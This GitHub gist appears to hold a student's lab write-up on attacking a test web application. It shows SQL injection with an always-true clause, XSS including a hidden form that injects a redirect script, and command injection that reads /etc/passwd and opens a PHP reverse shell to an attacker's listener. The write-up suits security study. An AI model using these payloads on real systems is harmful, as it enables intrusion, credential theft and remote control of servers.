-
-
Save zweicoder/f40d5daf04e51aca0d1c to your computer and use it in GitHub Desktop.
Hello!
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <meta charset="utf-8"> | |
| <meta name="viewport" content="width=device-width, initial-scale=1.0"> | |
| <title>Hello!</title> | |
| <link rel="stylesheet" href="https://stackedit.io/res-min/themes/base.css" /> | |
| <script type="text/javascript" src="https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS_HTML"></script> | |
| </head> | |
| <body><div class="container"><h2 id="sql-injection">SQL Injection</h2> | |
| <ul> | |
| <li><p>The vulnerability was using: <br> | |
| <code>SELECT * FROM accounts WHERE username='$USERNAME' and password='$password'</code></p> | |
| <p>Hence by using a random <code>$username</code> and <code>$password</code> as <code>pass' OR '1' = '1</code>, we force the string to become: <br> | |
| <code>SELECT * FROM accounts WHERE username = 'user' and password= 'password' OR '1'='1'</code> <br> | |
| which returns everything</p></li> | |
| <li><p>Table name was <code>accounts</code>. </p></li> | |
| <li>Fields are username, password and signature.</li> | |
| </ul> | |
| <h2 id="xss">XSS</h2> | |
| <ul> | |
| <li><p>I inserted <code><script>alert('hacked')</script></code>, which caused the <code><script></code> tag to be inserted into the DOM, causing it to run every time the page loads.</p></li> | |
| <li><p>I wrote a HTML form:</p></li> | |
| </ul> | |
| <pre class="prettyprint"><code class=" hljs ocaml"><form <span class="hljs-keyword">method</span>=<span class="hljs-string">"POST"</span> action=<span class="hljs-string">"http://10.0.1.250/index.php?page=dns-lookup.php"</span>> | |
| <input <span class="hljs-class"><span class="hljs-keyword">type</span>=</span><span class="hljs-string">"hidden"</span> name=<span class="hljs-string">"target_host"</span> <span class="hljs-keyword">value</span>=<span class="hljs-string">"<script>window.location.href='capture-data.php'</script>"</span>></input> | |
| <input <span class="hljs-class"><span class="hljs-keyword">type</span>=</span><span class="hljs-string">"hidden"</span> name=<span class="hljs-string">"dns-lookup-php-submit-button"</span> <span class="hljs-keyword">value</span>=<span class="hljs-string">"Lookup+DNS"</span>></input> | |
| <button <span class="hljs-class"><span class="hljs-keyword">type</span>=</span><span class="hljs-string">"submit"</span>>button</button> | |
| </form></code></pre> | |
| <p>The phishing form will send a POST request with <code>target_host</code> having my script to be injected, and <code>dns-lookup-php-submit-button</code> so that the request works. The script that I injected will potentially be used to redirect users to a malicious <code>capture-data.php</code>.</p> | |
| <h2 id="injection">Injection</h2> | |
| <ul> | |
| <li><code>&& cat /etc/passwd</code> injects the additional <code>cat</code> command after whatever command runs</li> | |
| <li>First I did <code>ifconfig</code> to get my IP, and then <code>nc -l -p 8080 -vvv</code> to listen to the port at <code>localhost</code>. Finally I inject <code>&& php -r '$sock=fsockopen("<your_ip>",8080);exec("/bin/sh -i <&3 >&3 2>&3");'</code> to the site which opens an interactive shell for my IP at port 8080</li> | |
| </ul></div></body> | |
| </html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment